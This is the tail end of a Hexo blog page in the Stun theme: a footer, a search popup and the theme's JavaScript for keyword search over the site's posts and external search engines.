class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2021</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>John Doe</span></div><div><span>由 <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> 强力驱动</span><span> v5.4.0</span><span class="footer__devider">|</span><span>主题 - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.6.2</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><div class="search-mask"></div><div class="search-popup"><span class="search-close"></span><div class="search-input"><input placeholder="搜索文章（支持多关键词，请用空格分隔）"></div><div class="search-results"></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script>function initSearch() {
  var isXML = true;
  var search_path = 'search.json';

  if (!search_path) {
    search_path = 'search.xml';
  } else if (/json$/i.test(search_path)) {
    isXML = false;
  }

  var path = '/' + search_path;
  $.ajax({
    url: path,
    dataType: isXML ? 'xml' : 'json',
    async: true,
    success: function (res) {
      var datas = isXML ? $('entry', res).map(function () {
        // 将 XML 转为 JSON
        return {
          title: $('title', this).text(),
          content: $('content', this).text(),
          url: $('url', this).text()
        };
      }).get() : res;
      var $input = $('.search-input input');
      var $result = $('.search-results');
      // 搜索对象（标题、内容）的权重，影响显示顺序
      var WEIGHT = { title: 100, content: 1 };
      var searchPost = function () {
        var searchText = $input.val().toLowerCase().trim();
        // 根据空白字符分隔关键字
        var keywords = searchText.split(/[\s]+/);
        // 搜索结果
        var matchPosts = [];

        // 有多个关键字时，将原文字整个保存下来
        if (keywords.length > 1) {
          keywords.push(searchText);
        }
        // 防止未输入字符时搜索
        if (searchText.length > 0) {
          datas.forEach(function (data) {
            var isMatch  = false;
            // 没有标题的文章使用预设的 i18n 变量代替
            var title = (data.title && data.title.trim()) || '[ 文章无标题 ]';
            var titleLower = title && title.toLowerCase();
            // 删除 HTML 标签 和 所有空白字符
            var content = data.content && data.content.replace(/<[^>]+>/g, '');
            var contentLower = content && content.toLowerCase();
            // 删除重复的 /
            var postURL = data.url && decodeURI(data.url).replace(/\/{2,}/g, '/');
            // 标题中匹配到的关键词
            var titleHitSlice = [];
            // 内容中匹配到的关键词
            var contentHitSlice = [];

            keywords.forEach(function (keyword) {
              /**
              * 获取匹配的关键词的索引
              * @param {String} keyword 要匹配的关键字
              * @param {String} text 原文字
              * @param {Boolean} caseSensitive 是否区分大小写
              * @param {Number} weight 匹配对象的权重。权重大的优先显示
              * @return {Array}
              */
              function getIndexByword (word, text, caseSensitive, weight) {
                if (!word || !text) {
                  return [];
                };

                var startIndex = 0; // 每次匹配的开始索引
                var index = -1;     // 匹配到的索引值
                var result = [];    // 匹配结果

                if (!caseSensitive) {
                  word = word.toLowerCase();
                  text = text.toLowerCase();
                }

                while((index = text.indexOf(word, startIndex)) !== -1) {
                  var hasMatch = false;
                  // 索引位置相同的关键词，保留长度较长的
                  titleHitSlice.forEach(function (hit) {
                    if (hit.index === index && hit.word.length < word.length) {
                      hit.word = word;
                      hasMatch = true;
                    }
                  });
                  startIndex = index + word.length;
                  !hasMatch && result.push({ index: index, word: word, weight: weight });
                }
                return result;
              }
              titleHitSlice = titleHitSlice.concat(getIndexByword(keyword, titleLower, false, WEIGHT.title));
              contentHitSlice = contentHitSlice.concat(getIndexByword(keyword, contentLower, false, WEIGHT.content));
            });

            var hitTitle = titleHitSlice.length;
            var hitContent = contentHitSlice.length;

            if (hitTitle > 0 || hitContent > 0) {
              isMatch = true;
            }
            if (isMatch) {
              ;[titleHitSlice, contentHitSlice].forEach(function (hit) {
                // 按照匹配文字的索引的递增顺序排序
                hit.sort(function (left, right) {
                  return left.index - right.index;
                });
              });
              /**
              * 给文本中匹配到的关键词添加标记，从而进行高亮显示
              * @param {String} text 原文本
              * @param {Array} hitSlice 匹配项的索引信息
              * @param {Number} start 开始索引
              * @param {Number} end 结束索引
              * @return {String}
              */
              function highlightKeyword (text, hitSlice, start, end) {
                if (!text || !hitSlice || !hitSlice.length) {
                  return;
                }

                var result = '';
                var startIndex = start;
                var endIndex = end;
                hitSlice.forEach(function (hit) {
                  if (hit.index < startIndex) {
                    return;
                  }

                  var hitWordEnd = hit.index + hit.word.length;
                  result += text.slice(startIndex, hit.index);
                  result += '<b>' + text.slice(hit.index, hitWordEnd) + '</b>';
                  startIndex = hitWordEnd;
                });
                result += text.slice(startIndex, endIndex);
                return result;
              }

              var postData = {};
              // 文章总的搜索权重
              var postWeight = titleHitSlice.length * WEIGHT.title + contentHitSlice.length * WEIGHT.content;
              // 标记匹配关键词后的标题
              var postTitle = highlightKeyword(title, titleHitSlice, 0, title.length) || title;
              // 标记匹配关键词后的内容
              var postContent;
              // 显示内容的长度
              var SHOW_WORD_LENGTH = 200;
              // 命中关键词前的字符显示长度
              var SHOW_WORD_FRONT_LENGTH = 20;
              var SHOW_WORD_END_LENGTH = SHOW_WORD_LENGTH - SHOW_WORD_FRONT_LENGTH;

              // 截取匹配的第一个字符，前后共 200 个字符来显示
              if (contentHitSlice.length > 0) {
                var firstIndex = contentHitSlice[0].index;
                var start = firstIndex > SHOW_WORD_FRONT_LENGTH ? firstIndex - SHOW_WORD_FRONT_LENGTH : 0;
                var end = firstIndex + SHOW_WORD_END_LENGTH;
                postContent = highlightKeyword(content, contentHitSlice, start, end);
              } else { // 未匹配到内容，直接截取前 200 个字符来显示
                postContent = content.slice(0, SHOW_WORD_LENGTH);
              }
              postData.title = postTitle;
              postData.content = postContent;
              postData.url = postURL;
              postData.weight = postWeight;
              matchPosts.push(postData);
            }
          });
        }

        var resultInnerHtml = '';
        if (matchPosts.length) {
          // 按权重递增的顺序排序，使权重大的优先显示
          matchPosts.sort(function (left, right) {
            return right.weight - left.weight;
          });
          resultInnerHtml += '<ul>';
          matchPosts.forEach(function (post) {
            resultInnerHtml += '<li><a class="search-results-title" href="' + post.url + '">';
            resultInnerHtml += post.title;
            resultInnerHtml += '</a><div class="search-results-content">';
            resultInnerHtml += post.content;
            resultInnerHtml += '</div></li>';
          });
          resultInnerHtml += '</ul>';
        } else {
          resultInnerHtml += '<div class="search-results-none"><i class="far fa-meh"></i></div>';
        }
        $result.html(resultInnerHtml);
      };
      $input.on('input', searchPost);
      $input.on('keyup', function (e) {
        if (e.keyCode === Stun.utils.codeToKeyCode('Enter')) {
          searchPost();
        }
      });
    }
  });
}

function closeSearch () {
  $('body').css({ overflow: 'auto' });
  $('.search-popup').css({ display: 'none' });
  $('.search-mask').css({ display: 'none' });
}

window.addEventListener('DOMContentLoaded', function () {
  Stun.utils.pjaxReloadLocalSearch = function () {
    $('.header-nav-search').on('click', function (e) {
      e.stopPropagation();
      $('body').css('overflow', 'hidden');
      $('.search-popup')
        .velocity('stop')
        .velocity('transition.expandIn', {
          duration: 300,
          complete: function () {
            $('.search-popup input').focus();
          }
        });
      $('.search-mask')
        .velocity('stop')
        .velocity('transition.fadeIn', {
          duration: 300
        });

      initSearch();
    });
    $('.search-mask, .search-close').on('click', function () {
      closeSearch();
    });
    $(document).on('keydown', function (e) {
      // Escape <=> 27
      if (e.keyCode === Stun.utils.codeToKeyCode('Escape')) {
        closeSearch();
      }
    });
  };

  Stun.utils.pjaxReloadLocalSearch();
}, false);

function safeOpenUrl(url) {
  var newTab = window.open();
  newTab.opener = null;
  newTab.location = url;
}

function extSearch(engine) {
  var engines = {
    google: 'https://www.google.com/search?q=',
    bing: 'https://cn.bing.com/search?q=',
    baidu: 'https://www.baidu.com/s?ie=UTF-8&wd=',
  };
  var host = window.location.host;
  var query = $('.search-input input').val().toLowerCase().trim();
  var uri = engines[engine] + query + ' site:' + host;

  if (query) {
    safeOpenUrl(uri);
  } else {
    Stun.utils.popAlert('warning', '请输入字符');
  }
}

var assistSearchList = window.CONFIG.assistSearch;

if (Array.isArray(assistSearchList)) {
  assistSearchList.forEach(function (name) {
    document.querySelector('.search-btns-item--' + name).addEventListener('click', function () {
      extSearch(name);
    }, false);
  });
}</script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script><script type="application/json" src="/search.json"></script></body></html>